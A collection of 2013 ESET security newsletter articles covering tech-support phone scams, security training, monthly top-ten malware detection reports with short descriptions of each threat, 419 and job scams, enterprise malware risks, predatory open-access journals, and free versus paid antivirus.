On this latest occasion, though, the scammer didn’t go into the ‘you are leaking viruses onto the entire Internet’ spiel: instead, having ascertained that I actually had a computer, he started to tell me about computer errors and how they were worse than viruses because anti-virus software doesn’t detect them. As he didn’t seem deterred by my bursting into laughter, I told him that I’m a security researcher specializing in exposing support scams. As he didn’t seem to know what a support scam is, I started to explain it to him, but he rang off. So I don’t know exactly where he was going: no doubt he was going to ‘prove’ to me – perhaps with Event Viewer or ASSOC – that my system was at risk. But while I’m always interested in the latest scammer ploys, sometimes you just don’t want to waste a Friday evening scammer baiting. Still, it seems that this is not an unusual approach: this, for instance, was a recent comment to one of my earlier blogs:

“…Said they were getting errors from my machine and my harddrive was corrupted. He prompted me to look at the event viewer, where I scrolled down and came to the first error which I tried to relate to him but he said that is all he needs and the error proves that my machine is infected. I have a good virus program and a good malware program I told him, but he said that the malware was undetectable.”

Other recent comments showed that some people are still getting a certain amount of amusement out of yanking the chains of these wretched people. One of them interrupted their spiel by coming over all Anonymous:

We are Anonymous
We are one we are Many
We do not forgive
We do not forget
Expect US….

It amused me, too. I can’t guarantee that this will work in all cases, though.

Another told us:

“I did a quick search on Google for CLSID and found many examples of what a CLSID should look like. I quoted one of them to her and she freaked out because obviously I’m infected. So, I pretended to freak out too. I started screaming for my husband and quoting scripture. Having a blast by now. I kept yelling ‘save me Jesus!’ over and over. Then I begged her to please, please help me. What in the world am I to do? Poor helpless me!”

And finished off by telling the scammer in no uncertain terms what to expect if their paths crossed. Scary.

If you’re not familiar with this class of cold-call scam, here’s a paper a quartet of us (Martijn Grooten of Virus Bulletin, Steve Burn of Malwarebytes, my former colleague Craig Johnston and myself) presented at Virus Bulletin last year. It’s pretty comprehensive: My PC has 32,539 errors: how telephone support scams really work.

Other papers and blogs written or part-written by ESET researchers:

Education as Data Defense

Stephen Cobb, CISSP
Senior Security Researcher, ESET North America

One possible consequence of an information security failure is the compromise of personal information known as a data breach. Each year, the Ponemon Institute tracks the total cost of data breaches based on a broad sample of companies, then calculates the average cost per capita (or person exposed). The latest figure: $136 per record. That’s a global average, up from $130 in the previous year’s study (based on incidents at 277 companies in 9 countries, the May 2013 report was sponsored by Symantec).

Clearly, digital information systems that handle confidential personal data are crucial to much of what we do today, either as consumers or business people, and failure to protect those systems can have costly consequences. (Bear in mind that the Ponemon research found organizations in Germany and the U.S. experienced significantly higher costs, $199 and $188 respectively). Nevertheless, many people still seem to think we can keep these systems secure, always available, and always accurate, without providing the people who use them with relevant security training. That’s like thinking we can have a safe and reliable transportation system without well-trained mechanics and properly licensed vehicle operators.

Last year, ESET conducted two surveys in America to better understand this phenomenon of cybersecurity under-education. We asked employed Americans if they had ever received computer security training of any kind from their employer. Only 32% said they had. In a second study, we asked a different group of Americans if they had ever taken any classes or training related to protecting their computer and/or personal information. For 68% of respondents, the answer was never. In other words, we can assume that less than a third of the workforce has any cyber security training at all.

This is a serious problem and Verizon’s 2013 Data Breach Investigation Report speaks to this problem: The difficulty level of unauthorized intrusions into systems was rated as “low” in 78% of cases. Of course, the reality of a workforce under-educated in the realm of data defense is not news to criminals and other bad actors intent on abusing information technology for their own ends. They already know that employees are often the weakest link in an organization’s information security.

As long as high tech security measures can be beaten by low tech attacks that exploit human weaknesses—such as inadequate knowledge and understanding—our data and systems will remain at risk of serious compromise. If your organization needs to be persuaded to spend money on security awareness and training try sharing this calculation: 7,500 customer records exposed at a cost of $136 per record = more than $1 million.

When you consider that equation, spending money on information security training and awareness makes a lot of sense, on the organizational level and within society as a whole. After all, data breaches are not a rare occurrence these days. One reason for this is the underground market in stolen data that is now thriving. Yet some organizations still don’t realize that the personally identifiable information stored in their systems, be it customer records or employee records or data managed for a third party, is a target for cyber criminals.

Right now, the burden for security training falls mainly on companies, with some help from organizations like Security Our eCity and Ciber Seguridad. However, in the future your organization could be spared some of these costs if your country was committed to teaching cybersecurity hygiene to everyone, from an early age. We have not yet seen that kind of commitment in America, but that does not mean it is not possible. For example, in Estonia they have made cybersecurity training part of elementary-level school curriculum and they are working on expanding the program into preschool. Clearly, the time to invest in computer security training for employees is now, both at work and in our schools.

Monthly Threat Report: July 2013

Top_10_ELG_julio_13_eng

The Top Ten Threats

1.  WIN32/Bundpil

Previous Ranking: 1
Percentage Detected: 3.78%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains an URL address, and it tries to download several files from the address. The files are then executed and the HTTP protocol is used.  The worm may delete the following folders:
*.exe
*.vbs
*.pif
*.cmd
*Backup.

2. HTML/ScrInject

Previous Ranking: 2
Percentage Detected: 2.30%

Generic detection of HTML web pages containing script obfuscated or iframe tags that that automatically redirect to the malware download.

3. INF/Autorun

Previous Ranking: 3
Percentage Detected: 2.23%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While using this mechanism can make it easy to spot for a scanner that uses this heuristic, it’s better to disable the Autorun function by default, rather than to rely on antivirus to detect it in every case.

4. Win32/Sality

Previous Ranking: 5
Percentage Detected: 2.18%

Sality is a polymorphic file infector. When run starts a service and create/delete registry keys related with security activities in the system and to ensure the start of malicious process each reboot of operating system.
It modifies EXE and SCR files and disables services and process related to security solutions.
More information relating to a specific signature:
http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah


5. HTML/Iframe

Previous Ranking: 6
Percentage Detected: 2.04%

Type of infiltration: Virus
HTML/Iframe.B is generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious software.

6. Win32/Dorkbot

Previous Ranking: 7
Percentage Detected: 1.75%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor. It can be controlled remotely. The file is run-time compressed using UPX.
The worm collects login user names and passwords when the user browses certain web sites. Then, it attempts to send gathered information to a remote machine.  This kind of worm can be controlled remotely.

7. Win32/Conficker

Previous Ranking: 8
Percentage Detected: 1.71%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders.

8. JS/Chromex.FBook

Previous Ranking: n/a
Percentage Detected: 1.55%

JS/Chromex.FBook is a trojan that posts messages to user profiles on Facebook. Depending the variant of the family, the threat could be a malicious Google Chrome or Mozilla Firefox extension/plugin.

9. Win32/Ramnit

Previous Ranking: 9
Percentage Detected: 1.41%

It is a file infector. It’s a virus that executes on every system start.It infects dll and exe files and also searches htm and html files to write malicious instruction in them. It exploits vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotley to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files or shut down/restart the computer.

10. Win32/Qhost

Previous Ranking: 10
Percentage Detected: 1.26 %

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

Keyboards and Keywords

David Harley, ESET Senior Research Fellow

A version of this article also appeared on the Anti-Phishing Working Group blog.

The Wikipedia entry for ‘error message’ includes a number of infamous (and confusing) error messages, though it doesn’t include my all-time favourite:

Keyboard not found! Press any key to continue

And no, that’s not an urban legend. While I’m not sure that was the exact wording, I did see more or less that same error message two or three times back in the days when user support was part of my job.

The reason that I was scouring the web for links related to ‘error messages’ and  ‘security alerts’ is this: I happened across an article on the American Psychological Association web site that told me that Gary Brase (a psychologist) and Eugene Vasserman (a computer security researcher), of Kansas State University, have been given a $150,000 grant for research into developing more effective online alerts. I don’t know how many security companies have explored this approach – though I don’t believe for a moment that no security company has ever involved psychologists, focus groups, and ergonomists (amongst others with interest and expertise in aspects of human-computer interaction) in the development of a product and its user interface – but I’m sure we’ve all seen enough in the way of confusing software-generated alerts to agree that some software could do with a little more attention to the HCI dimension. There is a special place in my heart for the sort of alert that we often see along the lines of ‘EICAR test virus not-a-virus detected’.

In fact, while I may be biased – my own academic background was originally in social sciences, computer science being a later add-on – I don’t think that computer security that’s focused entirely on bits and bytes is ever going to solve the world’s problems with cybercrime, cyber-espionage, and all the other cyber-issues du jour. Certainly the kind of security alert that leaves the user wondering “What the heck does that mean? What does the darn thing want me to do?” is failing some kind of usability test.

The APA article includes a couple of examples cited by Brase:

“Do you want to trust this signed applet?” or “This application’s digital signature has an error; do you want to run the application?”

Frankly, I’ve seen far more confusing examples guaranteed to have the end user running to the nearest wall to bang his head against it. Such as any message that includes an error code or a hex string, or something like ‘unknown error scanning file [filename]’, or even a blank message box, but these examples do finger an essential problem with security alerts that I’m not sure $150k is going to be enough to fix.

The problem with Brase’s examples isn’t the wording, it’s conceptual. If the algorithm behind the program isn’t able to make a reliable determination of the risk, why should we expect the everyday user to be able to? Actually, he might: maybe he knows that a site is (normally) OK, even if he can’t be sure that it hasn’t been compromised in some way. Software has the disadvantage that it can only deduce intent from the programmatic characteristics of a program, or from automated textual analysis. And while filtering has progressed immeasurably from the days when phrases like ‘magna cum laude’ or the name Scunthorpe triggered porn detection algorithms all over the globe, there are still many contexts where an informed human being can make a better decision than an email or web filter. But ‘informed’ people aren’t the main target for research like this: rather, Brase states that “Good security alerts should be tailored for all types of users, no matter what their intent,” which suggests a wide range of skill/knowledge levels, as well as a wide range of target sites. There’s an important point there: I’m in agreement with being in touch with the intent of the user as well as that of the malefactor. In fact, Jeff Debrosse and I wrote a paper a few years ago in which we suggested that security companies could increase their effectiveness by incorporating analysis of the user’s behaviour into the software as well as analysis of programmatic behaviour – Malice Through the Looking Glass: Behaviour Analysis for the Next Decade – though I’m not holding my breath waiting for that approach to catch on. It is one way, potentially, of addressing another of Brase’s points: i.e. that ‘user education has not kept pace with the increasing complexity of Internet transactions.’ That, at least, is perfectly true. I’m all for making computers people-literate (the very apposite title of a book by Elaine Weiss).

The logical flaw here, though, is this: improving the presentation of security alerts won’t make security software (or other software with some security functionality, such as a browser using technology like Google’s Safe Browsing, for example) any more capable of discriminating between human motivation than it already is. That’s not such a negative comment as it sounds: programmatic filters don’t in themselves ‘detect’ malicious intent, but they do reflect the programmer’s understanding of some behaviour – programmatic or semantic – characteristic of malicious intent. But malicious behaviour is not a constant, not static. The average security program is a long way from achieving the same discrimination in analysing textual content that a moderately psychologically-aware human being is capable of.

The Google technology is actually a pretty good illustration of the limitations of technology for countering attacks that are primarily social engineering. Google tells us that Safe Browsing currently flags an impressive 10,000 sites per day as malicious, data that it now draws on for its Transparency Report. Yet phishing is considered to be a more effective attack than ever, many years after it first came to prominence as a major threat, though email is no longer its primary entry point, whereas web browsers and web-hosted services such as social media account for a high proportion of phish delivery.

This is by no means a criticism of Safe Browsing, which is a very useful layer of protection for web users (not just Chrome users – the technology is used by Firefox and Safari too), and I applaud their efforts. After all, anti-malware technology isn’t capable of detecting 100% of malicious programs and URLs either: if it were, this would be a very different world. For a start, we wouldn’t need to pop up any alerts asking users to answer questions they don’t understand: we’d simply tell them that the site or application they were trying to access would not be allowed to run, as the app believed it to be malicious.

But here in the real world, we need to bear in mind that there are plenty of malicious sites and other vectors out there – our lab processes several hundred thousand threats per day, and they don’t all come from those 10,000 web sites. So while Google’s Transparency Report statistics may prove interesting and useful – and no doubt have some PR value – end users should continue to be vigilant and take care in selecting which sites they visit, rather than assuming that they can click where they like because they have protection.

It’s not all bad news, though. I’ve just seen what may be the most inept 419 scam email of all time.

  • The sender is one Gen Peter Blay
  • The subject line reads “1”
  • The body text: well, technically, there is no body text. However, there is a signature: “your retrieve donation”

It’s hard to believe that there is anyone naïve enough to fall for that. Not least because it’s unclear from that what the scam actually is (presumably some form of advance fee fraud, though), let alone what the scammer needs the victim to do in order to execute the scam.

In other contexts, I’d probably write this off as an example of a spammer/scammer test run. In this case, though, I’m in some doubt as to whether he’ll work out how to do a 419 spam run before he expires from starvation. But perhaps I’m doing him an injustice. In that case, Gen Pete, just send the million dollars to me care of the ESET North America office.

Monthly Threat Report: March 2013

Analysis of ESET LiveGrid®, a sophisticated malware reporting and tracking system, shows that the highest number of detections this month, with almost 3.59% of the total, was scored by the INF/Autorun class of threat.

Top_10_ELG_march_13_eng

The Top Ten Threats

1.  INF/Autorun

Previous Ranking: 1
Percentage Detected: 3.59%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While using this mechanism can make it easy to spot for a scanner that uses this heuristic, it’s better, as Randy Abrams has suggested in our blog (http://www.eset.com/threat-center/blog/?p=94; http://www.eset.com/threat-center/blog/?p=828) to disable the Autorun function by default, rather than to rely on antivirus to detect it in every case. You may find Randy’s blog at http://www.eset.com/threat-center/blog/2009/08/25/now-you-can-fix-autorun useful, too.

2. Win32/Sality

Previous Ranking: 3
Percentage Detected: 2.19%

Sality is a polymorphic file infector. When run starts a service and create/delete registry keys related with security activities in the system and to ensure the start of malicious process each reboot of operating system.
It modifies EXE and SCR files and disables services and process related to security solutions.
More information relating to a specific signature:
http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

3. HTML/ScrInject.B

Previous Ranking: 4
Percentage Detected: 2.10%

Generic detection of HTML web pages containing script obfuscated or iframe tags that that automatically redirect to the malware download.

4. Win32/Dorkbot

Previous Ranking: 5
Percentage Detected: 2.09%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor. It can be controlled remotely. The file is run-time compressed using UPX.
The worm collects login user names and passwords when the user browses certain web sites. Then, it attempts to send gathered information to a remote machine.  This kind of worm can be controlled remotely.

5. Win32/Ramnit

Previous Ranking: 6
Percentage Detected: 1.79%

It is a file infector. It’s a virus that executes on every system start.It infects dll and exe files and also searches htm and html files to write malicious instruction in them. It exploits vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotley to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files or shut down/restart the computer.

6. Win32/Conficker

Previous Ranking: 7
Percentage Detected: 1.42%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders. In view of all the publicity Conficker has received and its extensive use of a vulnerability that’s been remediable for so many months, we’d expect Conficker infections to be in decline by now if people were taking these commonsense precautions. While the current ranking looks like a drop in Conficker prevalence, this figure is affected by the changes in naming and statistical measurement mentioned earlier: there’s no indication of a significant drop in Conficker infections covering all variants.

7. HTML/Iframe.B

Previous Ranking: 2
Percentage Detected: 1.29%

Type of infiltration: Virus
HTML/Iframe.B is generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location with malicious software.

8. HTML/Fraud

Previous Ranking: 45
Percentage Detected: 1.06%

HTML/Fraud is a trojan that steals sensitive information, like telephone numbers and e-mail addesses, and attempts to send the data to a remote machine. The trojan displays a dialog window asking the user to take part in a short survey, in order to persuade him to fill in personal information. The trojan contains a list of URLs and the HTTP protocol is used.

9. Win32/Qhost

Previous Ranking: 8
Percentage Detected: 0.98 %

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

10. JS/TrojanDownloader.Iframe.NKE

Previous Ranking: 9
Percentage Detected: 0.94%

It is a trojan that redirects the browser to a specific URL location with malicious software. The program code of the malware is usually embedded in HTML pages.

 

Bank Fraud and Job Scams

David Harley CITP FBCS CISSP, ESET Senior Research Fellow

Today I found a particularly endearing example of the 419 (advance fee fraud) scam in my mailbox.

 

The sender, one ‘Harry Cole’ claims to represent a bank called the IFC (presumably that’s the International Finance Corporation) and says that an ‘inquest’ (sounds like a matter of ‘grave’ concern) conducted by the bank turned up an ‘inactive/dormant’ account, and that I’m a ‘potential beneficiary to an unclaimed sum.’

 

Sounds interesting? Not really: this is a terse variation on a type of 419 where the scammer claims that he can cut you in on a bank account belonging to someone who died suddenly and intestate or without any known heirs, and that otherwise the money will go to some undeserving party such as corrupt government officials or into the bank’s own coffers. (That’s supposed to allow you to justify to yourself the fact that you’re agreeing to engage in a form of fraud. On the other hand, the fact that you know deep down that you would be defrauding the bank is also an effective way of discouraging you from reporting the scam when you realize you’ve been had.) If the recipient of the email is naïve enough to follow through, in due course he’ll find himself required to make various payments before the money can be transferred (hence advance fee fraud), which of course will never happen.

 

What makes it somewhat endearing in a dopey sort of way is that the ‘hook’ for this scam is that ‘the similarity in your name and email makes it possible for us to liquidate the deceased account in your favour. I wonder how they knew that my middle name is AskESET?

 

Yep. As interest in the new ESET blog and resources site at http://welivesecurity.com grows, so does the volume of scams and spams sent to our contact address askeset@eset.com. In fact, I used one of them as the basis for a recent blog: Job Scams: Nice Work If You Can Get It. A short extract:

 

The new ESET blog format must be striking a real chord with people. At any rate, job offers are just pouring in. Except that they don’t seem to be jobs for security bloggers, or for web developers like the team that maintains this site.

What qualifies us for an unspecified role in a hotel in Canada, I wonder? Perhaps they need someone to polish their emails. Some of the wording has a strong whiff of the West African 419, and after all, we’re not short of editing talent round here. But as our colleagues at ESET Ireland pointed out recently, at a time when the global economy is in crisis, there are all too many people solving their own employment and financial problems by scamming the unemployed, and job scams are an obvious way of grabbing their attention”

 

Blots on the Threatscape

David Harley CITP FBCS CISSP, ESET Senior Research Fellow

Recently, I was asked for some commentary on the effects of viruses in the enterprise. Finding myself writing far more than the journalist could possibly use, I thought you might find some of the content I produced interesting and/or useful. (Always the optimist…) Like many requests from journalists, this one took the form of some specific questions.

  • What are the key virus threats?

 

Strictly speaking, viruses in a technical sense – that is, self-replicating malware – are a pretty small blot on the threatscape, though from time to time something will come along and have a major impact. Stuxnet and its siblings, for instance, have had an impact out of proportion to the relatively small number of infections. But most people outside the security industry these days use the term as interchangeable with malware (malicious software). In fact, most malware nowadays is not self-replicating, but spread by other means such as spam campaigns.

 

Some of the significant malware and related attacks we see today include:

  • Banking Trojans ranging from Zeus and its siblings to Carberp
  • Ransomware (malware that encrypts your data or denies you access to your PC, then demands that you pay to get it back.
  • Phishing, which may involve the use of some form of Trojan
  • Bots that give the attacker the opportunity to control large groups of machines (botnets) for a variety of criminal activities: spam, phish and malware dissemination, Distributed Denial of Service attacks (often for purposes of extortion), captcha cracking.
  • Targeted attacks (see below)

 

Our current top ten, which you’ll find later in this document, gives you some idea about the most prevalent detections worldwide. However, some of our detections are highly generic, meaning that because of the use of advanced heuristics, a single detection might include specimens of malware that have common characteristics, but aren’t necessarily related in the sense of belonging to the same family or originating with the same gang. For instance, in the list below:

  • INF/Autorun includes all kinds of disparate malicious code that attempts to use the Windows Autorun/Autoplay mechanism to infect systems. While modifications to recent versions of Windows have severely curtailed the effectiveness of this infection vector, the figures indicate that there is still plenty of malware out there that includes code to misuse it.
  • Kryptik detections don’t describe a single Trojan family, but a wide range of malcode that shares certain coding techniques.
  • ScrInject is a class of malware that redirects a browser to a malicious URL.
  • Dorkbot is a bot that owes its position in the top ten to the fact that it’s extraordinarily widespread in South America and has been since 2011.

Note that the percentages relate only to instances of malware flagged by our telemetry – our software includes an option to report it to the ESET lab when an attempt to infect the machine it protects is detected. This gives us some feel for prevalence and – perhaps more importantly – the opportunity to refine our detections, but doesn’t say anything about the absolute numbers of infected machines worldwide. We don’t publish absolute numbers because they can be misleading.

 

However, some very significant malware doesn’t get anywhere near the top ten. The kind of stealthy, targeted threat that the security industry sometimes calls an APT (Advanced Persistent Threat) may remain undetected for long periods because of its very limited spread. Stuxnet was an interesting example of malware that finally got noticed because infections suddenly started to accelerate. ESET at first detected it heuristically, then developed Stuxnet-specific detections because there was a spike in infections. But the term ‘spike’ is relative: the numbers behind the percentages we see in the top ten are usually much higher than Stuxnet ever reached.

 

  • How do they weasel their way in and what can you do about it?

 

Most malware relies partly or completely on social engineering. Spam campaigns via email, the social media and so on, try to lure victims to sites booby-trapped with malicious code. Sometimes the site is legitimate but has been compromised by some form of hacking. The malicious code may be self-launching (drive-by downloads) or may be in the form of a malicious binary passed off as something desirable or useful. Targeted threats often exploit vulnerabilities in certain types of document (often PDFs, nowadays), and may be delivered as an attachment to mail or instant messaging. Email filters and similar defences are more likely to let a document through as an attachment than a program, especially if they use some form of 0-day exploit. However, they still rely on fooling the victim into opening the attachment. Criminal gangs use a variety of techniques to make it harder to detect malware, such as using legitimate programs and services like AMMYY to open a backdoor into an infected machine, or chaining together software components and web redirections where the unequivocally malicious code is at the end of the chain, so that even where the malcode is known, it won’t necessarily be seen by an antivirus scanner unless it’s able to step through the entire chain of steps.

 

This may seem like a weird thing for an AV researcher to say, but don’t rely on antivirus software. Multi-layered protection such as that used by well-protected corporates fills many of the gaps that AV can’t reach: even if it doesn’t recognize malware as such, it blocks some of the avenues that malware uses to get a foothold. Some ISPs and mail providers also use some of the tools that a large corporate uses (firewalling, intrusion detection and prevention, and so on) but a home user can also benefit from some similar technologies on the desktop using a proper security suite. Free antivirus programs are a lot better than nothing, but they don’t offer the same protection or support. When so many people are using their own devices at work, or working from home at least some of the time on their own PCs or other devices, it’s important that organizations take the protection of those devices into account when they consider the security of the organization as a whole.

 

  • Prevention is still better than cure, but what can you do if the worst happens?

 

Sometimes it’s easier to rebuild a system than to clean it, especially in a corporate environment, but it’s probably not necessary nearly as often as some sectors of the security industry will tell you. In fact, under these circumstances a good support contract is a welcome return on investment (apart from its value in terms of installation and maintenance support). Some large companies (Lockheed Martin and Boeing spring to mind) invest in trained professionals with very specific expertise in dealing with malware, reflecting the fact that such companies are often the first to see certain kinds of new threat family. Even small companies sometimes have in-house expertise – my own reputation, such as it is, was originally based on managing anti-virus for a medical research organization with less than 2,000 users. But sometimes significantly larger companies don’t have an in-house expert on malware or security on tap, and not all system administrators have the knowledge to deal with a serious local infection situation. So it makes sense to evaluate a security product’s support structure, not just its unit cost. Or consider outsourcing some security support, or factoring in the cost of training internal IT staff.

 

  • How can a virus infection harm the reputation of a company?

 

It would be unprofessional to discuss specific companies whose management of a breach I’ve been involved with personally, and discussion of other incidents is often speculative. I would say, though, that the most embarrassing virus incidents are those where the malware is well-known enough that you’d expect a well-protected organization to recognize and deal with an attack earlier than actually happened. However, a less well-protected organization may not be able (or willing) to identify the exact cause of a breach. In many countries, legislation exists that obliges a company to inform its customers when a breach endangers customer data, but not necessarily to give other details of the breach. When a company says, in effect, that it was attacked using an APT, there are often grounds for suspecting that what it means is “we screwed something up and we’re not sure how, but we don’t want you to think it’s our fault.” In an era where targeted attacks are increasingly frequent and inflicted on a wide range of organizations, my feeling is that those organizations limit reputational damage better if they can say “we got something wrong, here’s what happened, and here’s what we’re doing to reduce the chances of its happening again.” It doesn’t have to be incredibly detailed – in fact, it may be bad security practice to give away too much information – but it does have to show that the company is genuinely managing the security problem, not just the PR problem.

Monthly Threat Report: February 2013

Academic Vanity Press: Who Gets Scammed?

David Harley CITP FBCS CISSP, ESET Senior Research Fellow

A version of this article was originally published by the Anti-Phishing Working Group in its eCrime blog.

I’m not a regular denizen of the ivory halls and towers of academia, despite having the title Senior Research Fellow at ESET and being a Fellow of the BCS Institute (the current name for the British Computing Society). However, I’ve recently become aware of a journal paper submission scam for which even a quasi-academic is apparently a suitable target. At any rate, I recently received a minor blizzard of emails offering me the opportunity to submit a paper to one of several dozen open-access, peer-reviewed online journals, and to join them as an editorial board member or reviewer.

People do ask me to write, edit or review for them from time to time – after all, my primary job is authoring – but they’re usually rather more precise about which site or publication they want me to contribute to. They don’t let me choose from a variety of publications in disciplines of which I have no experience whatever. Most of them don’t expect to pay me for my efforts, but that’s fine: people who write blogs and papers that are published by a security company usually also write on behalf of the same company for reputable third parties like the Anti-Phishing Working Group, local press, specialist security magazines, and so on. The third party gets a wider spread of expertise than if it only used in-house staff, especially if the writer is already established; the security company and the author get a wider audience and are seen as a force in the knowledge-sharing research community, not just a marketing operation.

However, in this case it was money that was wanted, not my presumed expertise or reputation. The spammer doesn’t seem to know what my field of expertise actually is. And it turns out that if you want to be an editor or reviewer, you first have to submit a paper.  The cost of processing the article (copyedit, proofreading, and publication on acceptance) is up to $500 (but would have entailed a very substantial discount if I’d submitted it before January). It turns out that some similar organizations charge 3-4 times that much, though again they often offer impressive discounts.

Welcome to the seamier side of Open Access. Not that OA is in itself fraudulent. In principle, it provides unrestricted access to scholarly, peer-reviewed journal articles. Instead of the reader paying for access (for example, by paying a yearly subscription fee or for individual articles), the business model is largely reliant on the cost of publishing being borne by the author. It’s actually quite a complex and varied model, but for many academics and academic departments, publications constitute an essential performance metric, a numbers game that boosts their claim to tenure and gives them an advantage in the job market. Research information is both a core product and a marketing asset, so it can work very well.

However, it may come as no surprise that there are journals whose review process is less rigorous than you’d expect. On the other hand, what may be more surprising is how many Open Access journals have little or no content, or cheerfully include articles from disciplines different to the one indicated by the journal title, or include names on editorial and review boards of people who have never agreed to participate, or whose credentials are seriously misrepresented. I guess it’s not a scam if you get what you want out of it: if buying your bibliography by the yard – the way some people buy books for their study – makes your résumé look more attractive, you may consider it worth the money. But if you obtain and maintain your position by buying credibility at the expense of those who earn theirs, doesn’t that mean that an academic employer is being cheated, and the academic community as a whole being short-changed? Is there a lot of difference between buying exposure in a dubious pseudo-academic publication and buying your self a degree from an email spammer?

Free Isn’t Always Better

David Harley CITP FBCS CISSP, ESET Senior Research Fellow

A different version of this article was originally published on the ESET blog.

ESET Ireland’s Urban Schrott has blogged recently that “Research reveals nearly half of all Irish computers depend on free antivirus for protection”. That proportion isn’t in itself surprising: there are several options for anti-virus products that don’t cost anything for home users, and plenty of people who “believe that a free antivirus is equally effective in keeping their computers safe as a full security suite,” and more than a few irresponsible ‘security experts’ suggesting on the basis of spurious statistics and imperfect misunderstanding (hat tip to Kurt Wismer) of modern anti-malware technology that AV is not worth paying for.

Urban notes:

“Online security these days goes far beyond just sets of virus definitions as was the case with antivirus a decade ago. The multiple-vector attack nature of modern malware and cybercrime in general forces effective security suites to integrate antivirus, firewall, anti-spam, social media scanners and scam-site detectors, using traditional definition-based malware recognition, combined with proactive, behavioural heuristic detection. That is then also backed up by large teams of security experts and analysts, who monitor the web 24/7 for new outbreaks and new forms of attack as well as offer tech support to their users.”

But his statistics (based on a poll commissioned by ESET Ireland) also throw up some interesting sidelights on consumer habits and attitudes that I’m sure are reflected in other parts of the world.

  • 45% of users use free AV, which is a lot better than being one of the 5% using no security software at all (as long as you’re using a competent mainstream program and you’re not one of the “3% minority … mad enough to use pirated antivirus.”)
  • Still, it’s actually quite encouraging that a good proportion of those surveyed use a licensed security suite or a licensed AV product in combination with other security software. Not only because licence payments for anti-malware keep people like me in steak and Merlot, but because it shows that there are people with a healthy recognition that AV is not sufficient protection.

There’s also some demographic analysis indicating that women are more cautious (and likelier to pay for security software) than men, while the youngest age-group is also the most reckless. (This is well in line with other research from the same source.)

Inevitably, one comment posted to the ESET Ireland blog accused Urban of ‘lame FUD’, to which he responded trenchantly: “It isn’t FUD to say that AV (free or not) doesn’t have the same defensive capabilities as a security suite, or that free AV isn’t as well supported as its for-fee equivalent. That’s the trade-off and we’re far from the only ones saying it.”

